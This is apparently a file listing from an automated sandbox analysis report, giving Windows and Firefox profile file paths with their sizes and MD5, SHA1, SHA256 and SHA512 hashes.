-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize20KB
MD5bd888a7174306df1b8bcbaf30919e3c9
SHA1fafe705e494c2f3e26d3c05037189e1f07ad0487
SHA2565a486e89bf87aa780bef5fd8552e14ee2bcc9348107cdc55aab55ab3bac5c86a
SHA512fc3e016be078b49b30266e6074b1ba14554a4f3ed8b5f0bbb27a556d268a4e8f93db03a035b82025fe042f787dee3a714a6f01415259f9b632aa42c169e749a7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize18KB
MD588106e01098407f7437955ce92d9e90c
SHA11a4c254bde7bf638693f45daf871a87a842d3593
SHA25651d2c38ff2da1ba3f35ac425a32a5afdc56f240322e6ce20a586aed81344b397
SHA512f28e22ada0dba397df173ffdf0f740075d830c51fdc3a7300e0d98258b4553b8296f58548c99f88e0ab479c525f22344c0f9d903c6f681a1032bd0a76fd31a73
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize20KB
MD515ea5b8424b6a455ad193b5b4448bdd6
SHA1e2394e059412ed0760ae1ab016d040c78ecd281d
SHA2567da5998e46c0a1fc88b4ae3f96873c5159a495a9a398dedf9adeda63f21eb490
SHA512ef22a516739c5eee0666661285781beb1ccfedd98c10d123ccd3a579bc69e83bcb27813c23f0d231773c047ecaa0bb10775cc44b4702b2789097713cc970a6ef
-
Filesize
2KB
MD542f056567dc9481bd024a4a9d602d2cd
SHA1b46720637b329400df5f946b832a3bb2774308d4
SHA25628f9746bdc00096e29adc80eea69a5f37966fe826d37f6f86747c163ce629bb9
SHA5124ae93742f2ea188dccef5bb8079e468fc4019b7c2b54bf1cc7270d9c796aa0b9bc2dbdfba73b034677edb0ec180393f956fa2aba9e8fab10513d3c98a561929d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\AlternateServices.bin
Filesize7KB
MD54ce2816eb9109db87ce86577e7ffb911
SHA16d36d914fd87c8df6a6de60a84747c46feae024b
SHA256abd51f6d6233d22decb29ef44eea954e4b3857385c089464bd18295cfcde6de9
SHA512ad5aaf4f5acf890e045c3e4a413561910666b9189bb411b411749760a5388f4265f398fcb3892307fa80da1e2c422443004e2bd586a41497004955da6d5c162b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\AlternateServices.bin
Filesize10KB
MD518be88c38bddfa3db3caf163698b7db6
SHA1fd8823c6106364dfe67d97135c5ef7db67558226
SHA256519a3e3634161d7593b5c1b596a29ba47b83d6ec16602935c0bbb679a02fea0d
SHA512b70fc7082a4ff68fc3d7bdcf9d2b02918ac9a5935497e259c2c90138ceae19bd60fd7c9225302fa7ce5687508a3a8f23ec9ba93ec8554a9babbbc7e34558a28b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\AlternateServices.bin
Filesize16KB
MD5916a05a23eaef14e6402127138b8fb67
SHA1cd467ef59dc39f9b6d24f5b2ce59ae73c23c8956
SHA2565ca1851c0a957fcf26341c4f87088aa99f5696d23094aed257014227c820cd4a
SHA512b7eac6f6a3f5a6035b27747b31266966a66e58e9494b3d528be373afce799ba86c8c5f96599a8d80297b99419816db5f3f993fb72c75a37d8e6193e859829158
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD51d453087a6de949374c9b1a920227a80
SHA113e8cd18ad5f7648502dffb298f844d35a673cdc
SHA256b7c83fb7b5493b1f6ff0234bfb29b6376faf5d4060990ef51eb96eca0de243ed
SHA5127e4efc3731de089f51c16dcf9875cb172231e8eb9564a1719916868060848a0a49d300b0678c2d74506ad5ac15b969b8dc38428e1197d43ea60fe81167712426
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD598201275087b24443b79dc4e31c9b1ff
SHA11b27fb5df2d8114dc51cc5b431ad87113af646a2
SHA256358efd3e9beffe98bb0000ffd6d5b7fab5a2c6742ba993e7d666870cf6c11c82
SHA5121edb58c67c699bd1dd334ed92f2ceb1d28cdc70a36c66d123655da6ff4463cdb106565438aa844d809e51e13fbefd1a609f77bfb7ffc95d8cb8b4daf6481e3ff
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5193d5be0e4ec41e5aa66b698e598867b
SHA1b0bd791c970f1ea26a412103fdad2dcedaa80de2
SHA2563e586af3948f1b47e1c3c4861ed3d8120cfa562410a0e5fc5bcc8a0b1134d9d9
SHA512760e9bea2343905f8eb569f7a4357d6a188c39b786980262068edc8bad2d9a7a1b919c7b221fcf42ca7ddeb3638148e32853541c7bbab09cd733a6b2d1664ddc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5a061974c9179befca4e3ec9e069c6b61
SHA1c5973d0336df8c8e1ddee1b84719849455b060f5
SHA256e3fa48b5e689e1e74c8fb855c9f76f2cfaf94564a40d5339de80fad76086b06b
SHA512ba2ff2987bd50cf7bcc87ecab0f7341c3326a8e9b82ade43b1f9a829ed2fb75dc7657e1a6691f87da32dcb5cb5c56c0c549ea53c29cd641043a584259e72d55a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\datareporting\glean\pending_pings\005c269a-390a-4205-af12-e32688d33c1b
Filesize27KB
MD56e97784c422098d7c10652816c70738e
SHA1620b983968050bb2197c1706538f9651bff31f8a
SHA2567b5abd583b16c9da2222796bd93e1d63294694049299cdddc5ced5781d017a63
SHA512302a09edcf838dd0c4c0e362a7b6d7c44a888798a25dca5c8a3f107f4c05983753a6532902e7bbb21d1d4a2d2188b37279531b8e1ea6e12c87a34954adfc2eec
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\datareporting\glean\pending_pings\2be10f83-1092-4d37-86e7-90241ebe448e
Filesize671B
MD53f111c1fc9fa184b062d1ad3b377fdc0
SHA1dd3e701adb00fcf848d98e1c246e605f545d2401
SHA2565d2da601b14c56b66d89120041d030962002b16f0775053fecaa10edadd02430
SHA512b8cb6dcee0e2ad48f6325ea680c8d001890f46c1db56c13153861746690b79ba0807a81eeccc67c340a30a32ac723f87138b1f50b6ae402ad99b8692c4b525b3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\datareporting\glean\pending_pings\e8a5c287-779a-4e26-8084-b1f5b3476a9c
Filesize982B
MD534d7b95fa0c7e689da095e9f5e39702c
SHA11e13bc52804b2149b4cd617331f7a0d78177972d
SHA256d5eed02838fbffe417383c08e940da79ef9fd6cc86725ae7f5f512627211db5a
SHA51247f1fbae0b359d44056b65276957d8ed955866d68ff5bd39e782a22b938d378d56f6bef1175de392a08b4457a137537eaa97aa0e037ac504662fa78f90c53657
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll.sig.tmp
Filesize1KB
MD536e5ee071a6f2f03c5d3889de80b0f0d
SHA1cf6e8ddb87660ef1ef84ae36f97548a2351ac604
SHA2566be809d16e0944386e45cf605eae0cd2cf46f111d1a6fe999fec813d2c378683
SHA51299b61896659e558a79f0e9be95286ebf01d31d13b71df6db4923406e88b3ba72584ef2b62e073b2f5e06901af2c7d1b92d3d12187fe5b4b29c9dd2678444f34e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll.tmp
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
12KB
MD52641bb2c20b33686887bdb09e2246bb5
SHA1fa6a76917ee1978859f04387d0dce572e5351a44
SHA256b6c640d9a18b5b081906dba346cdb01e1456df024863f2a12db1cba04978f3e8
SHA51258dc9df9834aecc8a5afdcca5cebd7c36f7cb69d537c3c1bba9a5b0c22cfa5102d25e240eac93e795854643f86d3e98694e66e8e091452d0c79ea9beaa4beb0a
-
Filesize
11KB
MD5dcbe0b17ce520702a5e451239e8b97de
SHA1c514a35c46b888971a9c2130449a950c70d89d5c
SHA256d6f8b4ece4d4dd2d7c1efbd1265067946d5301c8c255bfb81077f886480edd45
SHA5129724df6c083fe8b9b0d76c9f46a36db56eb609d2c2e3e28c4e605b3022d682342c9c79d2d900f3414daa4975cbd247b6b2fd4a3218eae51d5e5bab553276b09c
-
Filesize
11KB
MD5e34d35df402f33c3fe2c819df8c2b4c4
SHA141f8a94be694b1d98636cb1173a9fc8ff125afc9
SHA2560435b6f75dcbdcdcb808f144ad66bdd83fbc0762986a37fbb11b87559f891129
SHA512593657128363e69d84331e667f403f415d84472015df726c62a39c6f97d40ac87a50e37e9a702203cb6c39c35b02f957951374b9f9e382b5d094428298a3022e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\sessionstore-backups\recovery.baklz4
Filesize5KB
MD53146aad3250574927f81b502f5d118be
SHA125f8ef3f952cc70c34f33c24a9c962294af63bfb
SHA256980ea7f78e34e311a864643e621547cb1485f8d47cd638129b8495c71a4dfea1
SHA512ad393c50ad3c262381a15cc3205a9a45628f4827d14b98a3111396aa19bac16c4a83c711417edb10bc5bab61b9c0fab40e8f56d2abdcfe56d6895568952ef583
-
Filesize
2.6MB
MD55a1002c2cc43234a6a64f1a26a62cf39
SHA122e3ab82953900887a02783a393c45c553a3d091
SHA256209800aca2ca48387ed5dbdd844d24b6dd5c58a8dc07842fbf7fc1a96020732c
SHA512deba3a839e981bc1fcc89254bd0a8337e6a10ad61f1c4c7fa7c00803d59654c2eb5cd282a3d5826d6af8839b4dceb5cf982ca97af53640eb8cd7ba4d9921dc78
-
Filesize
296KB
MD5cb81c4f58be99c67cf212a3b1c2450f9
SHA10df25d0684e3506641b0bfab49a346f110d0d58b
SHA256966ff1ed2f0524dabfd3a23eba9a888a7eb49efef5b74a2dbeca00f671012f25
SHA5125e9cc82c81b0462112e53d68bdeb6f8e55644505884b817563b3d9b6c0b26d2d0948500272ea725ac632c8fbdffb3782dc1585ab95e365d90c576a05abd929fc
-
Filesize
570B
MD5e3972ef73e970315f378c3c268fdd2db
SHA17afd11c93f7378b27b2db1ac89d98958899cd945
SHA256d6c3bb962eea4be64cd243d3b505ce7f20c73af54ae157ff536d3db366787715
SHA5127811488bfe0280a6d1c56f5eb418e23a2e44d61ba44fe979e699956c139a8b68638f23e9990b98a1d65acaa25d9105f4e62523c5a93686cc6cd44d4645a58f3f
-
Filesize
7B
MD54047530ecbc0170039e76fe1657bdb01
SHA132db7d5e662ebccdd1d71de285f907e3a1c68ac5
SHA25682254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750
SHA5128f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e
-
Filesize
89KB
MD55d063ffa2617c8ab5e7e2fc5bcd2a254
SHA1f53d13f3344bedbf2d94100b88f7e1c17a6887c4
SHA2563a1ef1291e45d93aabcb651e4633ec02393dc8e2905a534e806e5c77e1e1cfa0
SHA512c708b2fc4fd93442ac7c6347688cd9cc55575f3decf85f55e64039cfa922c9c8926d4b885c2d42ba447f89ba0cd5c031de316da28b6bbe7b03f0381e5d758e1c
-
Filesize
330B
MD50df577d1ccff2d25c50c691e74ec78ea
SHA1d5ef1424f3185e50b168f15cbead325a2021799e
SHA25679fbe08338bab8374e6e8bf83107ee8ca692c5d9d597488720d3dc59b52de34a
SHA512fb3f874ea1ffa94a2d32261adaff965ba2463be671d51f6bbc902de5b35b9ad6e042623e7bb1aed98f25dd9fbfc73334fab91c81a44b69f7a5bca3ee4b434f56
-
Filesize
535KB
MD502cb519ae4e9a8b51a936212869d9adb
SHA14e4dc850c6bcf33d68b59bde2544c2c8095b1f42
SHA2565918e797e154c2a73f93e28158c6e3ff077775de1c1a489ffc2ce1239270b88a
SHA512ecb205d8a6dc6adc31e1dcccfd010897dab6d955fc1ba0b06251c533494cd9bd421f343cc3db75ed7a2eb140aa48e3fb70aafc21cf1548c4b5654948ae6ecb88
-
Filesize
6.3MB
MD5a738460ec3463b20a197e6a91c221a45
SHA16b7e775e9cbbed57862e41cb52f5d67155ccd832
SHA256db7e7f5569354151e5ab9ed7f62de3e930c19f415a583e649b985831595b1829
SHA512060d74b1d4e620113b126245dd0970d72900ce388fcd4aee5ed9a8b2631908b5ff1d5ee891de17272771629e71717ef1a52c86c7d936b81dd09a6b48eb454880
-
Filesize
1.2MB
MD5c9db6b5c84be13a43ad23cc204e4bc52
SHA194bd6634303205715fd04f8aa10d75158390e4d9
SHA25677200156d4773175d341aad11ab23bd52445065cd95060348da17d083dc27688
SHA5129273493c5e5ea24b2f5ee219fdf849546e85b3f5cc24c970f1ab6fdcfe961d96ca6fd41c96f9d915892ab24ce7ff409f0f5a6569b0225e95d36afba51615f8d6
-
Filesize
1.8MB
MD54e682551bcfdeb8b4ce646267fa70f91
SHA1c940bf4640a8bbb706f5cd4c7ddf674bab27490b
SHA256b0a41ef79b4e2d1103fc3cb904cf290727eea95d3d5e558a402b89810e358398
SHA512c7cd2f65618079a41927878121b3b3194f55b7962f9a6014a37a68891899d4e5fe95f669331e825ea1c4f2a545bcbbb08d2853ee9413377a7f67b01f63a71c19
-
Filesize
190KB
MD5b483bb4c375468cfdae4a2ed4e40d056
SHA127311ef3b6a323335f46c4e81889a77ffb1b3002
SHA256df80d9477a45eb1ff233f3d361a1d82729c368987de14c09747df0f959184902
SHA5120116e83611626c27099a0171654a4f24d64c0c901bc597bf168f889a300a1f3aa62ef48759a78081fa1add6d82a8dd63d94eeba1d828d1aefa8ef17d2b0fb141
-
Filesize
208KB
MD5c2540f15c66d32d867f8205e39ba5c2f
SHA17a835852b20e9721eab276543e0202465e702d07
SHA2569b296f4894f4a969f2f3ce0c5c2ddb8eea503deb4919b23555fc3f04fa0aed41
SHA5123e0cd859f84598a409370498ba601147559c42f77a685bb131080e92e3cb87af1fcb793711d4331ce880deae4491cef3969f9e996e17b63caa3aa1d98d6c13e9
-
Filesize
3.7MB
MD52b117301b1e7ebfe62bef6b9fa9288e2
SHA1d5e3fcab4526731ba3f5bf0ad914d616d4bd474f
SHA256c21b934852b65af249b78f95a45df6ee7afed09c35630ac37ab3c646df3a9c80
SHA5128fbe5c2e33b9429da123e9025cef8f13d93a51035f5fa232fe1187783ddb0d57d95fee7eb780ad840de8938ca6fc140a3b335469ef0ac13283381a6e3b4f945a